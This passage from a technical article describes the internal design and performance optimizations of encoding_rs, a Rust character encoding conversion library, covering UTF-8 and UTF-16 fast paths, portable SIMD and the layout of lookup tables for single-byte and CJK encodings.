(Cow is a Rust standard library type that wraps either an owned type or a corresponding borrowed type, so a heap allocation and copy can be avoided if the caller only needs a borrow. E.g., Cow<'a, str> wraps either a heap-allocated string or a pointer and a length designating a string view into memory owned by someone else. Lifetime 'a indicates that the lifetime of borrowed output depends on the lifetime of the input.)

Internals

Internally, there are five guiding design principles.

  1. For the legacy CJK encodings the conversions to and from UTF-8 and UTF-16 should come from the same source code instead of being implemented twice. (For the UTFs and for single-byte encodings, there are enough optimization opportunities from having two implementations that it doesn’t make sense to keep those unified for the sake of unification.)
  2. Since Web content is either markup, which is runs of ASCII mixed with runs of potentially non-ASCII, and CSS and JS, which are almost entirely ASCII, handling of the ASCII range should be very fast and use SIMD where possible.
  3. Small binary size matters more than the speed of encode into legacy encodings.
  4. For performance, everything should be inlined into the conversion loop. (This rules out abstractions that would involve virtual calls from within the conversion loop.)
  5. The instantiation of converters should be very efficient—just a matter of initializing a few machine words. The instantiation should not read from the file system (other than the system lazily paging in the binary for encoding_rs itself), run decompression algorithms, allocate memory on the heap or compute derived lookup tables from other lookup tables.

Abstracting over UTF-8 and UTF-16

Even though in principle compile-time abstraction over UTF-8 and UTF-16 is a matter of monomorphizing over u8 and u16, handling the two cases using generics would be more complicated than handling them using macros. That’s why it’s handled using macros. The conversion algorithms are written as blocks of code that are inputs to macros that expand to provide the skeleton conversion loop and fill in the encoding-specific blocks of code. In the skeleton in the decode case, one instantiation uses a Utf8Destination struct and another uses a Utf16Destination struct both of which provide the same API for writing into them. In the encode case, the source struct varies similarly.

Using Rust Lifetimes to Match Buffer Accesses to Space Checks

The old code in uconv was relatively ad hoc in how it accessed the input and output buffers. It maybe did stuff, advanced some pointers, checked if the pointers reached the end of the buffer and maybe even backed off a bit in some places. It didn’t have an overarching pattern to how space availability was checked and matched to memory accesses so that no accesses could happen without a space check having happened first. For encoding_rs, I wanted to make sure that buffer access only goes forwards without backtracking more than the one byte that might get unread in error cases and that no read happens without checking that there is still data to be read and no write happens without checking that there is space in the output buffer.

Rust’s lifetimes can be used to enforce an “at most once” property. Immediately upon entering a conversion function, the input and output slices are wrapped in source and destination structs that maintain the current read or write position. I’ll use the write case as the example, but the read case works analogously. A decoder that only ever produces characters in the basic multilingual plane uses a BMP space checking method on the destination that takes the destination as a mutable reference (&mut self). If the destination is a UTF-8 destination, the method checks that there is space for at least three additional bytes. If the destination is a UTF-16 destination, the method checks that there is space for at least one additional code unit. If there is enough space, the caller receives a BMP handle whose lifetime is tied to the the lifetime of the destination due to the handle containing the mutable reference to the destination. A mutable reference in Rust means exclusive access. Since a mutable reference to the destination is hidden inside the handle, no other method can be called on the destination until the handle goes out of scope. The handle provides a method for writing one BMP scalar value. That method takes the handle’s self by value consuming the handle and preventing reuse.

The general concept is that at the top of the loop, the conversion loop checks availability of data at the source and obtains a read handle or returns from the conversion function with InputEmpty and then checks availability of space at the destination and obtains a write handle or returns from the conversion function with OutputFull. If neither check caused a return out of the conversion function, the conversion loop now hasn’t read or written either buffer but can be fully confident that it can successfully read from the input at most once and write a predetermined amount of units to the output at most once during the loop body. The handles go out of scope at the end of the loop body, and once the loop starts again, it’s time to check for input availability and out space availability again.

As an added twist, the read operation yields not only a byte of input but also an unread handle for unreading it, because in various error cases the spec calls for prepending input that was already read back to the input stream. In practice, all the cases in the spec can be handled by being able to unread at most one unit of input even though the spec text occasionally prepends more than one unit.

Optimizing ASCII and Multibyte Sequences

In practice, the ISO-2022-JP converters, which don’t need to be fast for Web use cases, use the above concept in its general form. For the ASCII-compatible encodings that are actually performance-relevant for Web use cases, there are a couple of elaborations.

First, the UTF-8 destination and the UTF-16 destination know how to copy ASCII from a byte source in an efficient way that handles more than one ASCII character per register (either a SIMD register or even an ALU register). So the main conversion loop starts with a call to a method that first tries to copy ASCII from the source to the destination and then returns a non-ASCII byte and write handle if there’s space left the destination. Once a non-ASCII byte is found, another loop is entered into that actually works with the handles.

Second, the loop that works with the handles doesn’t have a single scope per loop body for multi-byte encodings. Once we’re done copying ASCII, the non-ASCII byte that we found is always a lead byte of a multi-byte sequence unless there is an error—and we are optimizing for the case where there is neither an error nor a buffer boundary. Therefore, it makes sense to start another scope that does the handle obtaining space check choreography again in the hope that the next byte will be a valid trail byte given the lead byte that we just saw. Then there is a third innermost loop for reading the next byte after that so that if non-ASCII we can continue the middle loop as if this non-ASCII byte had come from the end of the initial ASCII fast path and if the byte is ASCII punctuation, we can spin in the innermost loop without trying to handle a longer ASCII run using SIMD, which would likely fail within CJK plain text. However, if we see non-punctuation ASCII, we can continue the outermost loop and go back to the ASCII fast path.

Not matching on a state variable indicating whether we’re expecting a lead or trail byte on a per-byte basis and instead using the program counter for the state distinguishing between lead and trail byte expectations is good for performance. However, it poses a new problem: What if the input buffer ends in the middle of a multi-byte sequence? Since we are using the program counter for state, the code for handling the trail byte in a two-byte encoding is only reachable by first executing the code for handling the lead byte, and since Rust doesn’t have goto or a way to store continuations, after a buffer boundary we can’t just restore the local variables and jump directly to the trail byte handling. To deal with this, the macro structure that allows the reuse of code for decoding both to UTF-8 and to UTF-16 also duplicates the block for handling the trail byte such that the same block occurs between the function method entry and the conversion loop. If the previous buffer ended in the middle of a byte sequence, the next call to the conversion function handles the trail of that sequence before entering the actual conversion loop.

Optimizing UTF-8

The UTF-8 decoder does not use the same structure as the other multi-byte decoders. Dealing with invalid byte sequences in the middle of the buffer or valid byte sequences that cross a buffer boundary is implemented naïvely from the spec in a way that is instantiated via macro from the same code both when converting to UTF-8 and when converting to UTF-16. However, once that outer tier of conversion gets to a state where it expects the next UTF-8 byte sequence, it calls into fast-track code that only deals with valid UTF-8 and returns back to the outer tier that’s capable of dealing with invalid UTF-8 or partial sequences when it discovers an incomplete sequence at the end of the buffer or an invalid sequence in the middle. This inner fast track is implemented separately for decoding UTF-8 to UTF-8 and for decoding UTF-8 to UTF-16.

The UTF-8 to UTF-16 case is close enough to one might expect from the above description of legacy multibyte encodings. At the top of the loop, there is the call to the ASCII fast path that zero-extends ASCII to UTF-16 Basic Latin multiple code units at a time and then byte sequences that start with a non-ASCII lead byte are handles as three cases: two-byte sequence, three-byte sequence or four-byte sequence. Lookup tables are used to check the validity of the combination of lead byte and second byte as explained below. The sequence is considered consumed only if it’s found to be valid. The corresponding UTF-8 code units are then written to the destination as normal u16 writes.

The UTF-8 to UTF-8 case is different. The input is read twice, but the writing is maximally efficient. First, a UTF-8 validation function is run on the input. This function only reads and doesn’t write and uses an ASCII validation fast path that checks more than one code unit at a time using SIMD or multiple code units per ALU word. The UTF-8 validation function is the UTF-8 to UTF-16 conversion function with all the writes removed. After the validation, the valid UTF-8 run is copied to the destination using std::ptr::copy_nonoverlapping(), which is the Rust interface to LLVM memcpy(). This way, the writing, which is generally less efficient than reading, can be done maximally efficiently instead of being done on a byte-by-byte basis for non-ASCII as would result from a read-once implementation. (Note that in the non-streaming case when the input is valid, both the second read and the writing are avoided. More on that later.)

It is not totally clear if this kind of double-reading is smart, since it is a pessimization for the 100% ASCII case. Intuitively, it should help the non-ASCII case, since even the non-ASCII parts can be written using SIMD. However, 100% ASCII UTF-8 to UTF-8 streaming case, which copies instead of borrowing, runs on Haswell at about two thirds of memcpy() speed while the 100% ASCII windows-1252 to UTF-8 case (which writes the SIMD vectors right away without re-reading) runs at about memcpy() speed.

The hard parts of looping over potentially-invalid UTF-8 are:

  • Minimizing the performance impact of deciding if the lead byte is valid
  • Minimizing the performance impact of deciding if the second byte is valid considering that its valid range depends on the lead byte
  • Avoiding misprediction of the length of the byte sequence representing the next scalar value.

encoding_rs combines the solution for the first two problems. Once it’s known that the lead byte is not ASCII, the lead byte is used as an index to a lookup table that yields a byte whose lower two bits are always zero and that has exactly one of the other six bits set to represent the following cases:

  • Byte is not a legal lead byte.
  • Lead byte is associated with a normal-range second byte.
  • Lead byte for a three-byte sequence requires special lower bound for second byte.
  • Lead byte for a three-byte sequence requires special upper bound for second byte.
  • Lead byte for a four-byte sequence requires special lower bound for second byte.
  • Lead byte for a four-byte sequence requires special upper bound for second byte.

The second byte is used as an index to a lookup table yielding a byte whose low two bits are always zere, whose bit in the position corresponding to the lead being illegal is always one and whose other five bits are zero if the second byte is legal given the type of lead the bit position represents and one otherwise. When the bytes from the two lookup tables are ANDed together, the result is zero if the combination of lead byte and second byte is legal and non-zero otherwise.

When a trail byte is always known to have the normal range, as the third byte in a three-byte sequence is, we can check that the most significant bit is 1 and the second-most significant bit is zero. Note how the ANDing described in the above paragraph always leaves the two least-significant bits of the AND result as zeros. We shift the third byte of a three-byte sequence right by six and OR it with the AND result from the previous paragraph. Now the validity of the three-byte sequence can be decided in a single branch: If the result is 0x2, the sequence is valid. Otherwise, it’s invalid.

In the case of four-byte sequences, the number computed per above is extended to 16 bits and the two most-significant bits of the fourth byte are masked and shifted to bit positions 8 and 9. Now the validitiy of the four-byte sequence can be decidded in a single branch: If the result is 0x202, the sequence is valid. Otherwise, it’s invalid.

The fast path checks that there is at least 4 bytes of input on each iteration, so the bytes of any valid byte sequence for a single scalar value can be read without further bound checks. The code does use branches to decide whether to try to match the bytes as a two-byte, three-byte or four-byte sequence. I tried to handle the distinction between two-byte sequences and three-byte sequences branchlessly when converting UTF-8 to UTF-16. In this case, the mask applied to the lead byte is taken from a lookup table and mask is taken from a lookup table to zero out the bits of the third byte and the third shift amount (from 6 to 0) in the two-byte case. The result was slower than just having a branch to distinguish between two-byte sequences and three-byte sequences.

Now that there is branching to categorize the sequence length, it becomes of interest to avoid that branching. It’s also of interest to avoid going back to the SIMD ASCII fast path when the next lead is not ASCII. After a non-ASCII byte sequence, instead of looping back to the ASCII fast path, the next byte is read and checked. After a two-byte sequence, the next lead is checked for ASCIIness. If it’s not ASCII, the code loops back to the point where the SIMD ASCII path has just exited. I.e. there’s a non-ASCII byte as when exiting the ASCII SIMD fast path, but its non-ASCIIness was decided without SIMD. If the byte is an ASCII byte, it is processed and then the code loops back to the ASCII SIMD fast path.

Obviously, this is far from ideal. Avoiding immediate return to ASCII fast path after a two-byte character works within a non-Latin-script word but it doesn’t really help to let one ASCII character signal a return to SIMD when the one ASCII character is a single space between two non-Latin words. Unfortunately, trying to be smarter about avoiding too early looping back to the SIMD fast path would mean more branching, which itself has a cost.

In the two-byte case, if the next lead is non-ASCII, looping back to immediately after the exit from the ASCII fast path means that the next branch is anyway the branch to check if the lead is for a two-byte sequence, so this works out OK for words in non-Latin scripts in the two-byte-per-character part of the Basic Multilingual Plane. In the three-byte case, however, looping back to the point where the ASCII SIMD fast path ends would first run the check for a two-byte lead even though after a three-byte sequence the next lead is more likely to be for another three-byte sequnces. Therefore, after a three-byte sequence, the first check performed on the next lead is to see if it, too, is for a three-byte sequence in which case the code loops back to the start of the three-byte sequence processing code.

Optimizing UTF-16LE and UTF-16BE

UTF-16LE and UTF-16BE are rare enough on the Web that a browser can well get away with a totally naïve and slow from-the-spec implementation. Indeed, that’s what landed in Firefox 56. However, when talking about encoding_rs, it was annoying to always have the figurative asterisk next to UTF-16LE and UTF-16BE to disclose slowness when the rest was fast. To get rid of the figurative asterisk, UTF-16LE and UTF-16BE decode is now optimized, too.

If you read The Unicode Standard, you might be left with the impression that the difference between UTF-16 as an in-memory Unicode representation and UTF-16 as an interchange format is byte order. This is not the full story. There are three additional concerns. First, there is a concern of memory alignment. In the case of UTF-16 as an in-memory Unicode representation, a buffer of UTF-16 code units is aligned to start at a memory address that is a multiple of the size of the code unit. That is, such a buffer always starts at an even address. When UTF-16 as an interchange format is read using a byte-oriented I/O interface, it may happen that a buffer starts at an odd address. Even on CPU architectures that don’t distinguish between aligned and unaligned 16-bit reads and writes on the ISA layer, merely reinterpreting a pointer to bytes starting at an odd address as a pointer pointing to 16-bit units and then accessing it as if was a normal buffer of 16-bit units is Undefined Behavior in C, C++, and Rust (as can in practice be revealed by autovectorization performed on the assumption of correct alignment). Second, there is the concern of buffers being an odd number of bytes in length, so the special logic is needed to handle the split UTF-16 code unit at the buffer boundary. Third, there is the concern of unpaired surrogates, so even when decoding to UTF-16, the input can’t be just be copied into right alignment, potentially with byte order swapping, without inspecting the data.

The structure of the UTF-16LE and UTF-16BE decoders is modeled on the structure of the UTF-8 decoders: There’s a naïve from-the-spec outer tier that deals with invalid and partial sequences and an inner fast path that only deals with valid sequences.

At the core of the fast path is a struct called UnalignedU16Slice that wraps *const u8, i.e. a pointer that can point to either an ever or an odd address, and a length in 16-bit units. It provides a way to make the unaligned slice one code unit shorter (to exclude a trailing high surrogate when needed), a way to take a tail subslice and ways to read a u16 or, if SIMD is enabled, u16x8 in a way that assumes the slice might not be aligned. It also provides a way to copy, potentially with endianness swapping, Basic Multilingual Plane code units to a plain aligned &mut [u16] until the end of the buffer or surrogate code unit is reached. If SIMD is enabled, both the endianness swapping and the surrogate check are SIMD-accelerated.

When decoding to UTF-16, there’s a loop that first tries to use the above-mentioned Basic Multilingual Plane fast path and once a surrogate is found, handles the surrogates on a per-code-unit and returns back to the top of the loop if there was a valid pair.

When decoding to UTF-8, code copied and pasted from the UTF-16 to UTF-8 encoder is used. The difference is that instead of using &[u16] as the source, the source is an UnalignedU16Slice and, additionally, reads are followed with potential endian swapping. Additionally, unpaired surrogates are reported as errors in decode while UTF-16 to UTF-8 encode silently replaces unpaired surrogates with the REPLACEMENT CHARACTER. If SIMD is enabled, SIMD is used for the ASCII fast path. Both when decoding to UTF-8 and when decoding to UTF-16, endianness swapping is represented by a trait parameter, so the conversions are monomorphized into two copies: One that swaps endianness and one that doesn’t. This results in four conversion functions: Opposite-endian UTF-16 to UTF-8, same-endian UTF-16 to UTF-8, opposite-endian UTF-16 to UTF-16, same-endian UTF-16 to UTF-16. All these assume the worst for alignment. That is, code isn’t monomorphized for the aligned and unaligned cases. Unaligned access is fast on aarch64 and on the several most recent x86_64 microarchitectures, so optimizing performance of UTF-16LE and UTF-16BE in the aligned case for Core2 Duo-era x86_64 or for ARMv7 at the expense of binary size and source code complexity would be a bit too much considering that UTF-16LE and UTF-16BE performance doesn’t even really matter for Web use cases.

Optimizing x-user-defined

Unlike the other decoders, the x-user-defined decoder doesn’t have an optimized ASCII fast path. This is because the main remaining use case for x-user-defined it is loading binary data via XMLHttpRequest in code written before proper binary data support via ArrayBuffers was introduced to JavaScript. (Note that when HTML is declared as x-user-defined via the meta tag, the windows-1252 decoder is used in place of the x-user-defined decoder.)

When decoding to UTF-8, the byte length of the output varies depending on content, so the operation is not suitable for SIMD. The loop simply works in a per-byte basis. However, when decoding to UTF-16 with SIMD enabled, each u8x16 vector is zero-extended into two u16x8 vectors. A mask computed by a lane-wise greater-than comparison to see which lanes were not in the ASCII range. The mask is used to retain the corresponding lanes from a vector of all lanes set to 0xF700 and the result is added to the original u16x8 vector.

Portable SIMD

(Nightly) Rust provides access to portable SIMD which closely maps to LLVM’s notion of portable SIMD. There are portable types, such as the u8x16 and u16x8 types used by encoding_rs. These map to SSE registers on x86 & x86_64 and NEON registers on ARMv7 & aarch64, for example. The portable types provide lane-wise basic arithmetic, bitwise operations, and comparisons in a portable manner and with generally predictable performance characteristics. Additionally, there are portable shuffles where the shuffle pattern is constant at compile time. The performance characteristics of shuffles rely heavily on the quality of implementation of specific LLVM back ends, so with shuffles it’s a good idea to inspect the generated assembly.

The portable types can be zero-cost transmuted into vendor-specific types in order to perform operations using vendor-specific intrinsics. This means that SIMD code can generally be written in a portable way and specific operations can be made even faster using vendor specific operations. For example, checking if a u8x16 contains only ASCII can be done very efficiently on SSE2 and aarch64, so the SIMD “is this u8x16 ASCII?” operation in encoding_rs has vendor-specific specializations for SSE2 and aarch64. This is an amazing improvement over C. With C, an entire langer function / algorithm that uses SIMD ends up being written separately for each instruction set using vendor intrinsics for everything—even the basic operations that are supported by practically all vendors. It often happens that such vendor-specific code is written only for x86/x86_64 with ARMv7 or aarch64 left as a todo with POWER, etc., completely ignored.

Despite Rust making SIMD portable, performance tuning for specific architectures using conditional compilation to turn alternative implementations on or off is still needed. For example, because NEON on ARMv7 lacks an efficient “is this u8x16 ASCII?” check, using NEON for processing the ASCII runs in UTF-8 validation turned out not to be an improvement over ALU-only code on ARMv7, even though using SIMD in UTF-8 validation makes sense on x86 and x86_64. On the other hand, the difference between using aligned or unaligned SIMD loads and stores is negligible on aarch64 (tested on ThunderX), so on that architecture encoding_rs uses unaligned loads and stores unconditionally. However, especially on Core2 Duo-era x86_64, the difference between using aligned access compared to using unaligned loads and stores with addresses that are actually aligned is very significant, so in the SSE2 case encoding_rs checks for alignment first and has four-way specializations for the four combinations of the source and destination being aligned or unaligned. As of June 2018, 20% of the Firefox x86/x86_64 release population was still on the kind of x86/x86_64 CPU where there’s a substantial performance disparity between aligned and unaligned SIMD loads and stores with actually aligned addresses.

Punctuation Loops

Using SIMD for ASCII poses the problem that many non-Latin scripts use ASCII spaces and punctuation. If we return directly to the SIMD path upon seeing a single ASCII byte after a sequence of non-ASCII, we may end up processing a SIMD vector only to find that it’s not fully ASCII, because it just starts with an ASCII space or an ASCII punctuation character followed by an ASCII space and then non-ASCII follows again.

For non-Latin scripts that use ASCII spaces and punctuation, after non-ASCII it is useful to have a loop that keeps processing ASCII bytes using the ALU as long as the byte values are below the less-than sign. This way, ASCII spaces, punctuation and digits do not result unhelpful use of SIMD, but HTML markup results in a jump back to the SIMD path.

In the case of the legacy CJK encodings, it’s easy to decide whether to have such a punctuation loop are not: Korean benefits from one, so EUC-KR gets such a loop. Chinese and Japanese don’t benefit from such a loop, so the rest of the legacy CJK encodings don’t get one.

The decision is trickier for single-byte encodings and UTF-8. In the interest of code size, all the single byte encodings (other than x-user-defined) are handled with the same code. For the Latin encodings, it would be beneficial not to have a punctuation loop. For Cyrillic, Greek, Arabic and Hebrew, it is beneficial to have the punctuation loop. Decoding the Latin single-byte encodings is faster anyway, so the punctuation loop is therefore all single-byte encodings for the benefit of the ones that are non-Latin but use ASCII spaces and punctuation.

UTF-8 calls for a one-size-fits-all solution. By the same logic, one should expect to put a punctuation loop in the UTF-8 to UTF-16 decoder. Yet, there is no punctuation loop in the UTF-8 to UTF-16 decoder. I don’t recall the details, but a punctuation loop didn’t behave well. I didn’t investigate why exactly a punctuation loop didn’t behave well in this case, but the conversion loop is pretty delicate even without a punctuation loop, so maybe there was some bad interaction in the optimizer. Rust has been through LLVM major version updates since I experimented with this code, so it might be worthwhile to experiment again.

Fast Instantiation of Converters

Character encoding conversion libraries typically reserve the right to perform expensive operations when a decoder or an encoder is instantiated. Expensive operations could include loading lookup tables from the file system, decompressing lookup tables or deriving encode-oriented lookup tables from decode-oriented lookup tables. This is problematic.

When the instantiation of a converter is potentially expensive, libraries end up recommending that callers hold onto converters and reset them between uses. Since encoding_rs builds BOM handling into the decoders, does so by varying the initial state of a state machine and BOM sniffing can change what encoding the decoder is for, being able to reset a decoder would require storing a second copy of the initial state in the decoder. More importantly, though, the usage patterns for character encoding converters tend to be such (at least in a Web browser) that there isn’t a natural way for callers to hold onto converters and creating some kind of cache for recycled converters create threading-problems and shouldn’t be the callers’ responsibility anyway. Even a thread-safe once-per-process heap-allocation on first use would be a problem. Firefox is both a multi-threaded and a multi-process application. E.g. generating a heap-allocated encode-optimized lookup table in a thread-safe way on first use would end up costing the footprint of the table in each process even if sharing between threads appeared simple enough.

To avoid these problems, encoding_rs guarantees that instantiating a converter is a very cheap operation: just a matter of loading some constants into a few machine words. No up-front computation on the data tables is performed during the converter instantiation. The data tables are Plain Old Data arranged in the layout that the conversion algorithms access. Of course, if the relevant part of the program binary hasn’t been paged in yet, accessing the data tables can result in the operating system paging them in.

Single-Byte Lookup Table Layout

The Encoding Standard gives the mapping tables for the legacy encodings as arrays indexed by what the spec calls the “pointer”. For single-byte encodings, the pointer is simply the unsigned byte value minus 0x80. That is, the lower half passes through as ASCII and the higher half is used for simple table lookup when decoding.

Conceptually, the encoder side is a linear search through the mapping table. A linear search may seem inefficient and, of course, it is. Still, the encode operation with the legacy encodings is actually rather rare in the Web Platform. It is exposed in only two places: in the error handling for the query string URLs occurring as attribute values in HTML and in HTML form submission. The former is error handling for the case where the query string hasn’t been properly percent escaped and, therefore, relatively rarely has to handle non-ASCII code points. The latter happens mainly in response to a user action that is followed by a network delay. An encoding library can get away with slowness in this case, since the slowness can get blamed on the network anyway. Furthermore, encoder speed that is shockingly slow percentage-wise compared to how fast it could be can still be fast in terms of human-perceivable timescales for the kind of input sizes that typically occur in the text fields of an HTML form.

The design of encoding_rs took place in the context of the CLDR parts of ICU having been accepted as part of desktop Firefox but having been blocked from inclusion in Firefox for Android for an extended period of time out of concern of the impact on apk size. I wanted to make sure that encoding_rs could replace uconv without getting blocked on size concerns on Android. Therefore, since there wasn’t a pressing need for the encoders for legacy encodings to be fast and there was a binary size concern (and the performance concern of instantiating an encoder excluding the option of spending time computing and encode-specific lookup table from decode-specific tables at the time of encoder instantiation), I made it a design principle that encoding_rs would have no encoder-specific data tables and instead the encoders would search the decode-oriented data tables even if it meant linear search.

As shipped in Firefox 56, the single-byte encoders in encoding_rs performed forward linear search across each quadrant of the lookup table for the single-byte encoding such that the fourth quadrant was search first and the first quadrant was searched last. This search order make the most sense for the single byte encodings considered collectively, since most encodings have lower-case letters in the fourth quadrant and the first quadrant is either effectively unused or contains rare punctuation.

In encoding_rs 0.8.11 (Firefox 65), though, as a companion change to compile-time options to speed up legacy CJK encode (discussed below), I relaxed the principle of not having any encode-specific data a little based on the observation that adding just 32 bits (not bytes!) of encoder-specific data per single-byte encoding could significantly accelerate the encoders for Latin1-like and non-Latin single-byte encodings while not making the performance of non-Latin1-like Latin encodings notably worse. Adding 8 bits for an offset in the lookup table to the start of a run on the consecutive code points, 8 bits for the length of the run and 16 bits for an offset to the start of the run in the Unicode code points, the common case (the code points to encode falling within the range) could be handled without a linear search. Unlike in the case of CJK legacy encode compile time options, the addition of 32 bits per single-byte encoding was small enough in added footprint that I thought it did not make sense to make it a compile-time option. Instead, the 32 bits per single-byte encoding are there unconditionally.

Multi-Byte Lookup Table Layout

For multi-byte legacy encodings, the pointer is computed from two or more bytes. In that case, the computation forms a linear offset to the array when not all values of the (typically) two bytes are valid or the valid values for the two bytes aren’t contiguous. This is in contrast to some previous formulations where two bytes are interpreted as a 16-bit big endian integer and then that integer is considered to map to Unicode. Since not all values of the two bytes are in use, simply interpreting the two bytes as a 16-bit big endian integer would result in a needlessly sparse lookup table. (A sparse lookup table can have the benefit of being able to combine bits from the lead and trail byte without an actual multiplication instruction, which may have been important in the past. E.g. Big5 with a dense lookup table involves multiplying by 157, which compiles to an actual multiplication instruction.)

Still with the linearization math provided by the spec, the lookup tables provided by the spec are not fully dense. Since legacy encodings are not exercised by the modern most performance-sensitive sites and binary size on Android was a concern, I sought to make the lookup tables more compact potentially trading off a bit of performance. Visualizing the lookup table for EUC-KR (warning: the link points to a page that may be too large for phones with little RAM) reveals that the lookup table has two unused vertical bands as well as an unused lower left quadrant. The Japanese lookup tables (JIS X 0208 with vendor extensions and JIS X 0212) also have unused ranges. The gbk lookup table has no unused parts but in place of unused parts has areas filled with consecutive Private Use Area code points. More generally, the lookup tables have ranges of pointers that map to consecutive Unicode code points. As the most obvious examples, the Hiragana and Katakana characters occur in the lookup tables in the same order as they appear in Unicode, therefore, forming ranges of consecutive code points. The handling of such ranges can be performed by excluding them from the lookup table and instead writing a range check (and offset addition) in the decoder program code. (Aside: The visualizations were essential in order to gain understanding of the structure of the legacy CJK encodings. I developed the visualizations when working on encoding_rs and contributed them to the spec.)

Furthermore, the way EUC-KR and gbk have been extended from their original designs has a relationship with Unicode. The original smaller lookup table appears in the visualizations of the extended lookup tables on the lower right. In the case of EUC-KR, the original KS X 1001 lookup table contains the Hangul syllables in common use. In the case of gbk, the original GB2312 lookup table contains the most common (simplified) Hanzi ideographs. The extended lookup table for EUC-KR, at the top and on the left, contains in the Unicode order all the Hangul syllabes from the Hangul Syllables Unicode block that weren’t already included in the original KS X 1001 part on the lower right. Likewise, the extended lookup table for gbk, at the top and on the left, contains in the Unicode order all the ideographs from the CJK Unified Ideographs Unicode block that weren’t already included in the original GB2312 part on the lower right.

That is, after omitting the empty vertical bands in EUC-KR, in both EUC-KR and gbk the top part and the bottom left part form runs of consecutive code points such that the last code point in each run is less than the first code point in the next run. These are stored as tables (one for top and another for botton left) that contain the (linearized) pointer for the start of each such run and tables of equal length that contain the first code point of each run. When decoding, binary search with the linearized pointer can be performed to locate the start of the run that the pointer belongs to. The code point at the start of the run can be then obtained by reading the corresponding item from the table of the first code points of the runs. The correct code point within the range can be obtained by adding to the first code point the offset obtained by subtracting the pointer to the start of run from the pointer being searched. On the encoder side, linear search with the code point can be performed in the table starting the first code point of each range instead after it has been established that the Hangul Syllable code point (in the EUC-KR case) or the CJK Unified Ideograph code point (in the gbk case) wasn’t found in the lower right part of the lookup table. (This process could be even optimized further by arranging the tables in the Eytzinger order instead.)

Adding more program code in order to make the lookup tables smaller worked in most cases. Replacing ranges like Hiragana and Katakana with explicitly-programmed range checks and by compressing the top and bottom left parts of EUC-KR and gbk as described above resulted in an overall binary size reduction except for big5. In the case of big5, the added program code seemed to exceed the savings from a slightly smaller lookup table. That’s why the above techniques were not applied in released code to Big5 after all.

However, Big5 did provide the opportunity to separate the Unicode plane from the lower 16 bits instead of having to store 32-bit scalar values. The other lookup tables (excluding the non-gbk part of gb18030, which is totally different) only contain code points from the Basic Multilingual Plane, so the code points can be stored in 16 bits. The lookup table for Big5, however, contains code points from above the Basic Multilingual Plane. Still, the code points from above the Basic Multilingual Plane are not arbitrary code points. Instead, they are all from the Supplementary Ideographic Plane. Therefore, the main lookup table can contain the low 16 bits and then there is a bitmap that indicates whether the code point is on the Basic Multilingual Plane or on the Supplementary Ideographic Plane.

It is worth noting that while the attempts to make the tables smaller strictly add branching when decoding to UTF-16, in some cases when decoding to UTF-8 they merely move a branch to a different place. For example, when the code has a branch to handle e.g. Hiragana by offset mapping, it knows that a Hiragana character will be three bytes in UTF-8, so the branch to decide the UTF-8 sequence length based on scalar value is avoided. (There are separate methods for writing output that is known to be three bytes in UTF-8, output that is known to be two bytes in UTF-8, and output that might be either two or three bytes in UTF-8. In the UTF-16 case, all these methods do the same thing an output a single UTF-16 code unit.)

The effort to reduce the binary size was successful in the sense that the binary size of Firefox was reduced when encoding_rs replaced uconv, even though encoding_rs added new functionality to support decoding directly to UTF-8 and encoding directly from UTF-8.

Optional Encode-Oriented Tables for Multi-Byte Encodings

In the case of Hangul syllables when encoding to EUC-KR even the original unextended KS X 1001 part of the mapping table is in the Unicode order due to KS X 1001 and Unicode agreeing on how the syllables should be sorted. This enables the use of binary search when encoding Hangul into EUC-KR without encode-specific lookup tables.

However, with the exception of gbk extension part that was not in original GB2312, the way the CJK Unified Ideographs have been laid out in the legacy standards has no obvious correspondence to Unicode order. As far as I’m aware, the options are doing a linear search over the decode-oriented data tables or introducing additional encode-oriented data tables. The relative performance difference between these two approaches is, obviously, dramatic.

Even though testing indicated that linear search over the decode-oriented data tables yielded acceptable human-perceived performance for the browser-relevant use cases even on phone-like hardware, I wanted to have a backup plan in case my determination of the human-perceived performance was wrong and users ended up complaining. Still, I tried to come up with a backup plan that would reach uconv performance (which already wasn’t as fast as as an implementation willing to spend memory on encode-specific tables could be) without having to add lookup tables as large as the obviously fast solution of having a table large enough to index by the offset to the CJK Unified Ideographs block would require.

Ideographs appear to be practically unused in modern Korean online writing, so accelerating Hanja to EUC-KR encode wasn’t important. On the other hand, GB2312, original Big5 (without the HKSCS parts) and JIS X 0208 all have the ideographs organized into two ranges: Level 1 and Level 2, where Level 1 contains the more frequently used ideographs. As the backup plan, I developed compile-time-optional encode acceleration of the Level 1 areas of these three mapping tables.

Since this was a mere backup plan, instead of researching better data structures for the problem, I went with the most obvious one: For each of the three legacy standards, an array of the level Level 1 Hanzi/Kanji sorted in the Unicode order and another array of the same length sorted in the corresponding order containing arrays of two bytes already encoded in the target encoding. In the case of JIS X 0208, there are three target encodings, so I used the most common one, Shift_JIS, for the bytes and added functions to transform the bytes to EUC-JP and ISO-2022-JP.

This solution was enough to make encode to the legacy CJK encodings many times faster than uconv. The backup plan, however, didn’t end up needing to ship in Firefox. Linear search seems to be fast enough, considering that users didn’t complain. Indeed, a linear search-based Big5 encoder had already been shipped in Firefox 43 without complaints from users. (However, this, in itself, wasn’t a sufficient data point on its own, since, anecdotally, it seems that the migration from Big5 to UTF-8 on the Web is further along than the migration from Shift_JIS and gbk.)

Even though impressive relative to uconv performance, accelerating Level 1 Hanzi/Kanji encode using binary search remained very slow relative to other encoding conversion libraries. In order to remove the perception that encoding_rs is very slow for some use cases, I implemented a compile-time option to use encode-only lookup tables that are large enough to index into directly by the offset into the Hangul Syllables or CJK Unified Ideographs Unicode blocks. With these options enabled, encoding_rs legacy CJK encoder performance is within an order of magnitude from ICU and kernel32.dll though still generally not exceeding their performance for plain text (that doesn’t have a lot of ASCII markup). Presumably, to match or exceed their performance, encoding_rs would need to use even larger lookup tables directly indexable by Basic Multilingual Plane code point and to have even fewer branches. It is worth noting, though, that while even larger lookup tables might win micro-benchmarks, they might have adverse effects on other code in real application workloads by causing more data to be evicted from caches during the encoding process.

In general, a library that seeks high encoder performance should probably take the advice given in the Unicode Standard and use an array of 256 pointers indexed by the high half of the Basic Multilingual Plane code point where each pointer either points to an array of 256 pre-encoded byte pairs indexed by the lower half of the Basic Multilingual plane code point or is a null pointer if all possible low bit combinations are unmapped.

